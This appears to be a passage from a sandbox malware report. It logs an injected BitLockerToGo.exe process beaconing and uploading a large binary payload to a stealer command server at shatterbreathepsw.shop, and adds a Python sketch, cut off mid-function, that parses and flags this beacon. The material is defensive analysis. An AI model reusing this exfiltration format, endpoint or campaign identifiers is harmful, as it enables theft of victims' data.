Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8CDE6C3E575306C9AFFE7640D69A6953--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"xpsGVF--GEIRO
                                                            2024-05-02 15:04:31 UTC4634OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de
                                                            Data Ascii: +?2+?2+?o?Mp5p_
2024-05-02 15:04:31 UTC | 810 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 15:04:31 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=aj0p7enlnrjeq607jkomrp31lg; expires=Mon, 26-Aug-2024 08:51:10 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mp%2Bx1GX3A%2Fl3lFHxJQcRM7iD7erqm7c1KAzv24n2hlokwhnxF8k6hmQ6GUyiOS64N2OJ%2BmjMZm%2BEJIqW31iGbpItFKWZ%2BLZz4jqwRukcp9eJWrRfsTJApFUHCLRhNi%2BEEHc1LbgvODhV"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d8e77cab7a4239-EWR
                                                            alt-svc: h3=":443"; ma=86400
2024-05-02 15:04:31 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 0d 0a
Data Ascii: 11ok 191.96.150.225
2024-05-02 15:04:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 5 | Source IP: 192.168.2.6 | Source Port: 49723 | Destination IP: 104.21.95.194 | Destination Port: 443 | PID: 7060 | Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-02 15:04:32 UTC | 287 | OUT | POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 3802
                                                            Host: shatterbreathepsw.shop
2024-05-02 15:04:32 UTC | 3802 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 44 45 36 43 33 45 35 37 35 33 30 36 43 39 41 46 46 45 37 36 34 30 44 36 39 41 36 39 35 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 78 70 73 47 56 46 2d 2d 47 45 49 52 4f
Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8CDE6C3E575306C9AFFE7640D69A6953--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"xpsGVF--GEIRO
2024-05-02 15:04:32 UTC | 804 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 15:04:32 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=mppi8fgkujg3u98lrlvhquncq2; expires=Mon, 26-Aug-2024 08:51:11 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DT9jtVdfuOMusrq3jQU2w%2BJYGxLjlr1WpVjEx0kF2kh8ufP4h3SPjJq4mSJqj5l5USYmptu12KO6vwDjIfpi99wfaluPLm2cFG98hKkVITKpbK28KsbnLZVtGleJ4CbKA10Dg%2F679B7%2F"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d8e781ed9c8c8f-EWR
                                                            alt-svc: h3=":443"; ma=86400
2024-05-02 15:04:32 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 0d 0a
Data Ascii: 11ok 191.96.150.225
2024-05-02 15:04:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 6 | Source IP: 192.168.2.6 | Source Port: 49724 | Destination IP: 104.21.95.194 | Destination Port: 443 | PID: 7060 | Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-02 15:04:33 UTC | 287 | OUT | POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1365
                                                            Host: shatterbreathepsw.shop
2024-05-02 15:04:33 UTC | 1365 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 44 45 36 43 33 45 35 37 35 33 30 36 43 39 41 46 46 45 37 36 34 30 44 36 39 41 36 39 35 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 78 70 73 47 56 46 2d 2d 47 45 49 52 4f
Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8CDE6C3E575306C9AFFE7640D69A6953--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"xpsGVF--GEIRO
2024-05-02 15:04:33 UTC | 806 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 15:04:33 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=ctu4ugf4a7528lok83o4mo3fje; expires=Mon, 26-Aug-2024 08:51:12 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F6oS%2F4xU%2BB9GmpUB7jLfsYDbMU1vfBqTVWhSt0Sosqa4EjSRIN%2F2yjLoQThLsqyN6lxp2nXe1gmm0oHTfZbhs2sfiABDohtQJmZiWx0fSKO5kLjhTQkNZRadxfJsMsBSoGEZQ0c7rLcW"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d8e786bd550c7a-EWR
                                                            alt-svc: h3=":443"; ma=86400
2024-05-02 15:04:33 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 0d 0a
Data Ascii: 11ok 191.96.150.225
2024-05-02 15:04:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 7 | Source IP: 192.168.2.6 | Source Port: 49726 | Destination IP: 104.21.95.194 | Destination Port: 443 | PID: 7060 | Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-02 15:04:34 UTC | 289 | OUT | POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 556486
                                                            Host: shatterbreathepsw.shop
2024-05-02 15:04:34 UTC | 15331 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 44 45 36 43 33 45 35 37 35 33 30 36 43 39 41 46 46 45 37 36 34 30 44 36 39 41 36 39 35 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 78 70 73 47 56 46 2d 2d 47 45 49 52 4f
Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8CDE6C3E575306C9AFFE7640D69A6953--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"xpsGVF--GEIRO
                                                            2024-05-02 15:04:34 UTC15331OUTData Raw: 48 88 1f cc 28 ec 0f 92 da 61 9a ed 1b 6c 1f 76 7f a9 29 7a c9 54 12 91 22 a4 60 8c 93 7e 7b 78 4c f9 57 58 40 74 e6 f3 c4 99 89 06 17 74 4b 85 cd d1 d4 9d 81 1b 63 57 8c b4 d6 af 9b 9b b6 a1 c4 9d 07 cd 69 b8 ab c6 0e aa ca cc 6f 2e 05 4d d2 92 b3 1a a4 f9 9e 26 31 15 29 5e a6 91 c5 07 99 55 4e e5 32 7a 2e 69 ab 93 1e fa 97 6c 59 53 93 05 26 6c 8d 50 c6 5f 21 f2 36 ba f9 31 04 d7 43 35 0a f8 23 ad 70 a9 d7 af ec f8 d6 8b 57 ab fd 37 56 41 c6 01 7a e8 38 ea ae 1e 43 54 0c 1d 23 a9 c3 d0 62 c9 96 75 42 9c 11 5d 47 a1 1a 15 86 7d 1e bb 33 fe 28 3d 06 62 94 f2 78 0d 97 41 b7 d2 1e 05 90 ad bd 7c e4 37 c0 38 f6 1a cf 14 24 cc c9 bc b6 9f f8 ab bf ce 7f 14 b5 b4 c3 c7 04 4d 4f 76 bb f1 62 30 db 5d e8 dc 3f 09 a5 eb 8f 23 32 af d5 84 b6 f5 5d 93 79 37 78 61 7d
                                                            Data Ascii: H(alv)zT"`~{xLWX@ttKcWio.M&1)^UN2z.ilYS&lP_!61C5#pW7VAz8CT#buB]G}3(=bxA|78$MOvb0]?#2]y7xa}
                                                            2024-05-02 15:04:34 UTC15331OUTData Raw: 4d d4 a5 70 9f 3b db 41 8f d2 97 04 3e 24 57 61 87 76 7b 74 a2 26 df 72 56 0d 60 74 d6 d1 99 5b 16 a4 1a b4 5c cf 93 87 b6 53 a0 f5 62 b3 80 60 95 79 56 86 f6 0f c5 14 83 6d bc f8 3a 77 4b 79 b8 8d 79 f9 2b 2e d9 44 72 6d dc a5 a0 21 08 d5 a4 69 dd 46 bc 22 78 d0 e9 54 79 50 fc e2 51 05 73 4b 8e ac 4f d6 6f fa 08 c0 9d da de ac b5 ff 8c 2e 75 bf ed 16 36 22 da 33 57 f2 f6 40 dd c6 a0 4f 0f 85 db 4f 39 b9 54 1b e9 06 53 05 40 69 c3 77 f7 9e 25 d7 e0 d3 11 9f de 67 3e 76 e7 ce da f7 54 74 99 1a 71 3f f4 6b d9 bc 7e cb da 58 a3 bc 99 7d 5f 19 d0 7c 23 7a 55 bb f7 db 09 0d 34 c5 0f d0 62 e9 69 22 f5 10 44 9a be 71 3d 5a 2f 7a 6b a5 43 97 35 05 31 b0 22 c3 75 23 7c a0 de 04 00 56 df 5d 08 56 f9 60 e0 d5 04 18 b8 40 ad 1b 86 e0 fb 5b 04 b5 7d 01 e3 1c 4c 41 02
                                                            Data Ascii: Mp;A>$Wav{t&rV`t[\Sb`yVm:wKyy+.Drm!iF"xTyPQsKOo.u6"3W@OO9TS@iw%g>vTtq?k~X}_|#zU4bi"Dq=Z/zkC51"u#|V]V`@[}LA
                                                            2024-05-02 15:04:34 UTC15331OUTData Raw: a7 6a 27 3e 9a e2 1e 5d ab 2b 1a 82 b3 a4 99 cc ec fe 6a ab df a8 e9 4f 6a 9f 1c 8a 55 aa ef a1 19 f7 d8 38 58 00 4a e2 85 f3 a1 14 99 68 8c 20 35 c9 5b 24 13 62 c5 ad 15 ee e9 36 12 87 c9 2d 7b 1c 48 37 ae 88 ff 52 0c 7c c6 c6 2d 67 1e 4a 0f ae 8c 73 ff b2 5e 31 12 23 d8 fd 1b 2e 40 10 0e 36 4a a2 76 db a7 cd d0 5d ff 54 08 af 94 5d 9c cb 0f 29 ae c4 65 26 cd f9 7c ea 95 04 69 91 ff 6b 8d fa 7f 97 43 15 b6 83 69 2c ea 84 3f e8 be 62 b5 0b e4 68 61 5c 26 f9 40 c3 6a c0 55 85 6b 4c 19 75 ec e7 8e a6 b5 63 07 c1 61 fe 78 a9 08 37 c8 72 f1 55 5c 08 0a 3e e9 0f 42 fb 0f 47 bb 5c 33 65 50 f0 59 56 43 83 f3 0b 49 58 90 aa f0 c3 98 7b b4 d1 49 96 73 34 f1 2a 36 e4 63 a3 31 f3 85 75 72 c8 41 54 df 5b 74 01 3f d4 55 5c 04 86 7b ea 8c cb 37 c7 05 3c ae 6c 1e d2 02
                                                            Data Ascii: j'>]+jOjU8XJh 5[$b6-{H7R|-gJs^1#.@6Jv]T])e&|ikCi,?bha\&@jUkLucax7rU\>BG\3ePYVCIX{Is4*6c1urAT[t?U\{7<l
                                                            2024-05-02 15:04:34 UTC15331OUTData Raw: f7 e3 e0 7f 8c 55 41 bd e4 bc 48 5d d8 d3 38 2d f5 da d2 6c 97 36 c9 f8 e7 cc 24 ef 56 04 e0 d3 44 6c 75 d1 43 c4 22 46 9b d4 9d 52 d9 c8 89 3e 63 75 e0 5c 64 9b 4e d7 5e 3d 5a ea aa 48 77 d8 c5 fa 5e 65 fd 8f 4c 72 7e 38 07 2d 8c 42 6d 24 d0 43 ef 57 20 64 5a 00 35 2d ba 08 b1 4c ec de d0 a7 c3 3f 9c 98 6f 34 c2 86 bb 34 28 5b ba 66 da 27 0d 0d b2 f8 dd fb cb 6f 6f bc 14 a5 89 f0 db 00 3b 0c 4f 57 be ad ce 78 4a a6 08 24 d7 c9 46 1a d5 21 49 20 71 0c 75 6e eb e2 58 35 7a 3e be 54 23 1d be 23 bc f4 58 58 4d 2e d9 c2 36 23 01 27 2e b6 77 be 70 c7 36 6d 01 85 5b dc c9 f5 a7 b2 91 47 84 8d ab be ad 34 6a 05 ac 66 b6 b0 09 61 8d da 18 71 f0 ba 77 df 48 d6 94 04 f8 76 bf f1 10 96 1e 7c 8d 2a 2f bf 13 08 7e 45 8f 54 45 1a cb ab 0b ff 31 5c 25 c7 7b f1 78 4e c4
                                                            Data Ascii: UAH]8-l6$VDluC"FR>cu\dN^=ZHw^eLr~8-Bm$CW dZ5-L?o44([f'oo;OWxJ$F!I qunX5z>T##XXM.6#'.wp6m[G4jfaqwHv|*/~ETE1\%{xN
                                                            2024-05-02 15:04:34 UTC15331OUTData Raw: 85 9c 45 3a b8 66 26 72 03 e0 c7 48 70 96 3b 26 bc 35 fd 9a 30 4d 3d b0 c5 49 74 6b 0a cc e6 a4 10 3a c6 f7 0e b4 a4 61 48 0a 03 d6 7d f4 c7 d2 9f 6e cd 0d 72 f3 db 4b 2c 8c a5 cd 10 5d 90 56 0e ce cb cf 8b 23 c8 86 9b 5d f3 6b 0c 20 f4 fa c6 16 b2 09 f6 b9 0c 31 b0 00 8e 4b ba 28 17 3e b4 6c c3 6a 6c 18 24 72 6c d6 32 51 8c af bd 6b 47 48 8e 9c 5b bc 16 af 8c 9e 59 44 c3 31 0f 75 21 b0 2f 15 68 a2 79 d3 95 d4 37 7e e1 64 1a f9 5c d4 69 0f 99 8c 62 4e 81 78 5a 44 d9 2c c3 74 77 a9 ca 6b 8d ee 9f d7 d1 28 30 b0 b8 da 74 04 66 c7 c0 9b fa 18 7e 70 9b 4c 7b f7 df 26 db 4d c0 a4 a9 01 cb 38 c7 fc 49 7f 3e e6 45 88 f1 17 55 17 03 ec f8 b0 5a 44 6f 4b 50 90 f9 30 e2 23 b2 2e a1 b8 43 e2 05 f2 78 fc 71 29 30 5d 0f 21 1a 56 0a 62 9c e8 85 1b f7 85 0f bc 72 c2 db
                                                            Data Ascii: E:f&rHp;&50M=Itk:aH}nrK,]V#]k 1K(>ljl$rl2QkGH[YD1u!/hy7~d\ibNxZD,twk(0tf~pL{&M8I>EUZDoKP0#.Cxq)0]!Vbr
                                                            2024-05-02 15:04:34 UTC15331OUTData Raw: 4a dd f5 7d e8 cf 50 79 f1 52 40 45 0c 96 50 f6 a3 61 54 d4 54 cf 69 87 0c c9 18 6a 1a 68 7d 1c 37 0a 91 cd c8 d3 20 bf 91 f5 80 6a db f9 c6 12 b7 25 8e b8 be 33 45 83 89 8a 0a 7d 2d db aa 8f 46 2e 24 da 12 6c b5 ce 0c d4 5a 6b b9 44 ec 10 2d 3d c9 4c 42 6a fb 6a fa ff b6 83 c3 53 84 3c 86 32 bc d1 af 65 e9 01 7d 51 82 0b 3a 76 43 8f 3d e7 dd b4 2a b8 ef 3c 3f 01 3e 4f 5e 31 81 a2 3d e5 39 79 6e bb 2f e0 76 a4 d5 13 80 16 26 84 ef 35 11 3f ee 66 8b 30 92 2e 25 3e 30 e9 c5 1c f7 31 de 99 ba 6b f2 34 39 c5 47 fe b5 2f cf 11 98 61 73 34 49 bd ea f9 54 ed bb a2 85 ab 04 db 91 06 cd 5b a9 66 35 49 9b 89 7f 5f 30 23 6b 20 8a e6 5b 95 72 ec dc 80 79 9d 31 c2 64 70 4e 2d d3 e6 05 a3 43 34 87 f5 c0 c7 55 63 93 2e 62 3a 8d 3d 03 72 e6 4c 9b f1 97 cb e3 ea cc 10 66
                                                            Data Ascii: J}PyR@EPaTTijh}7 j%3E}-F.$lZkD-=LBjjS<2e}Q:vC=*<?>O^1=9yn/v&5?f0.%>01k49G/as4IT[f5I_0#k [ry1dpN-C4Uc.b:=rLf
                                                            2024-05-02 15:04:34 UTC15331OUTData Raw: cd 08 e6 9f ce e3 8f 2a 73 f4 54 44 cf 1d 2f d1 32 39 7f aa 9e 4c 16 42 f4 d6 d6 1e 05 8e 10 37 ff bc 3e c8 3a a9 cc dc de ed 29 25 33 d7 06 a5 78 89 68 fe 1b b6 1a 9e 9c e6 e7 aa d9 27 5b 64 f1 11 41 7e 84 86 25 11 62 d2 b9 c7 b4 db 25 bd 1e 85 fd 56 70 e0 45 0b 04 66 74 4d de 31 f1 cf 90 e5 bc 24 d1 aa 78 b4 e2 50 ce 1c fd ce 44 83 20 1b 35 f4 84 ad 87 ec f6 af 6c d1 d9 16 fa b3 5e 37 67 8e 91 e0 39 6e ea b4 5a 64 58 17 d6 7e 9c 84 30 d1 10 28 fa 4e 99 e9 24 6c 6a 64 66 44 32 dc 78 cd 9f 05 19 3e 2f b8 83 71 21 4c 7d a6 41 03 4d 10 fa 25 b7 93 79 c9 c2 f1 12 b3 16 5a fb de 7b 8c a5 6d 38 de 01 a4 64 04 5f 0b 25 2d 21 67 e5 6a d7 34 9a 44 d5 e5 68 e2 f2 11 7e d0 b0 30 51 91 a2 98 95 fe 38 04 e5 9e 29 00 27 19 80 4b 4b 85 4d a8 f7 9f e4 f7 59 65 f2 43 67
                                                            Data Ascii: *sTD/29LB7>:)%3xh'[dA~%b%VpEftM1$xPD 5l^7g9nZdX~0(N$ljdfD2x>/q!L}AM%yZ{m8d_%-!gj4Dh~0Q8)'KKMYeCg
                                                            2024-05-02 15:04:34 UTC15331OUTData Raw: 9d a9 f3 0e d8 a9 57 d1 e8 fd 90 ee b1 f8 44 a1 8c d9 1d 66 93 09 8b 1a 5d d1 69 80 98 3e ab 59 01 15 c4 d2 31 8c 28 a4 9f e2 a8 b1 44 01 84 4d ab de 15 ef 05 a6 af f6 32 97 9e 1f 73 43 12 9f 79 e8 3d fc ab 08 4a 60 26 81 a8 31 01 47 0d 81 97 3c d8 cd b4 07 29 91 54 98 f3 ef 6d a3 ef 6e 22 65 83 c2 67 a1 85 2e 00 3b a2 0c 92 1c 1d 02 45 ae 61 01 b4 de 25 a6 67 a2 b0 e0 9e 1c b3 73 21 5c e3 a1 79 55 28 12 ab b8 de b5 69 1a 1d 89 8a 8a 8e 1a eb 98 87 ad 8c dd b3 b0 e8 20 4f 91 8c 56 e1 73 a6 d8 16 b3 03 87 53 af 0a 8a 83 47 27 19 c6 1a 02 97 d0 40 4e 69 fb 81 e8 e9 44 46 e2 71 52 1b a2 c1 fd 0e 56 b0 ef 05 47 14 24 16 81 96 2f 8c b5 d3 a0 1a 27 21 5d 96 ed 75 fd 70 cb 21 b6 09 34 ca b8 57 fa 90 a1 12 ad e3 5a 64 de 6b d9 61 39 f2 38 49 b4 03 36 e4 de 46 2d
                                                            Data Ascii: WDf]i>Y1(DM2sCy=J`&1G<)Tmn"eg.;Ea%gs!\yU(i OVsSG'@NiDFqRVG$/'!]up!4WZdka98I6F-
                                                            2024-05-02 15:04:34 UTC15331OUTData Raw: 6f 68 d3 8b b9 3f c1 46 e3 dc 5f 4a 89 95 7b aa b8 1f 87 c7 d6 76 a0 51 1b b5 14 fa 70 38 85 3b 3b 37 4e 77 4b 6d a2 cd b3 e9 01 96 cc 21 65 14 b7 d1 9c 91 40 f9 5d 3b ec 31 b1 e0 37 16 ba f9 9d 33 b8 1e a4 12 e4 67 52 96 1b 20 3a 3b 25 42 ff f3 5e 1f 80 d2 43 29 0f 37 bf b8 d9 6f 11 2c 6e 93 53 78 7a 1c f4 bd bd b0 ee d7 fd 7f 87 bd 0e 40 19 41 0b bb c0 07 1c 39 14 41 95 b8 8a 6d d3 02 5b d9 6a 1b 45 47 da c4 b6 02 a1 a9 c2 98 b2 10 3e 1f 45 a7 0f 3a 17 c9 ef 30 94 96 3f 8f 69 64 be e7 16 5b cb 90 c9 57 82 cc ad 37 b9 ff 6e d9 1d d6 b6 a4 cc 67 e2 01 03 3e 94 ee af 77 23 05 26 fa ee d2 7f 82 1e 0b b2 1d a8 85 3b 9e 02 52 36 dc bd c3 b3 e6 a4 04 44 dd d6 f4 43 04 01 06 1e 85 7d d0 3f 5b 9b 1e 84 b0 41 01 67 46 ef ae 85 a2 00 be dc 0b 88 dd 33 de 18 94 fd
                                                            Data Ascii: oh?F_J{vQp8;;7NwKm!e@];173gR :;%B^C)7o,nSxz@A9Am[jEG>E:0?id[W7ng>w#&;R6DC}?[AgF3
2024-05-02 15:04:38 UTC | 810 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 15:04:38 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=ptg8e02pib4vtgtjp7sgs5cubd; expires=Mon, 26-Aug-2024 08:51:17 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WMU0q03QIQGHx2dgSj%2F3ItNTTsrob9OdT40xFf2Hq2ZT9sMwqjs1LERRphdKCT1wXY4d5nXNW5LV6%2BQN6qr7gvuu8VQoztcorowvScwgP%2F2a%2BP%2BDyaWEQAV6a16JBlt%2Fd1wngeaL4YPp"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d8e7924ad32ee8-MEL
                                                            alt-svc: h3=":443"; ma=86400
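Sessions 4 to 7 above all carry the same exchange: the injected BitLockerToGo.exe process POSTs a multipart/form-data body to /api on shatterbreathepsw.shop with three text fields (hwid, pid, lid) followed by binary data, and the server answers with a chunked text/html body reading "ok <ip>" (191.96.150.225 in every capture here). The Python below is an added example written for this page, not code from the report, from Joe Sandbox or from the malware: it rebuilds the request from the dump, extracts the form fields, decodes the chunked reply and flags a request that has this shape. Everything in it is taken from the bytes shown above, with two assumptions: the dump cuts the lid value off after "xpsGVF--GEIRO", so the sample uses only that visible prefix, and the binary data that follows the lid field is omitted.

```python
"""Added example (not from the report or the malware): parse the LummaC-style
C2 beacon captured above, a multipart/form-data POST to /api carrying hwid, pid
and lid fields, answered by a chunked body "ok <ip>"."""
import re
from typing import Dict, Optional, Tuple

BOUNDARY = "be85de5ipdocierre1"  # boundary used by every request in the report

# Request reconstructed from session 4. The report's dump truncates the lid
# value after "xpsGVF--GEIRO", so only that visible prefix is used here, and
# the binary data that follows the lid field in the real upload is omitted.
SAMPLE_REQUEST = (
    "POST /api HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    "Host: shatterbreathepsw.shop\r\n"
    "\r\n"
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"hwid\"\r\n\r\n"
    "8CDE6C3E575306C9AFFE7640D69A6953\r\n"
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"pid\"\r\n\r\n3\r\n"
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"lid\"\r\n\r\nxpsGVF--GEIRO\r\n"
    f"--{BOUNDARY}--\r\n"
).encode()

# Response body exactly as dumped in the report: one 0x11-byte chunk, then the terminator.
SAMPLE_RESPONSE_BODY = bytes.fromhex(
    "31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 0d 0a 30 0d 0a 0d 0a"
)


def split_request(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split a raw HTTP/1.1 request into request line, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
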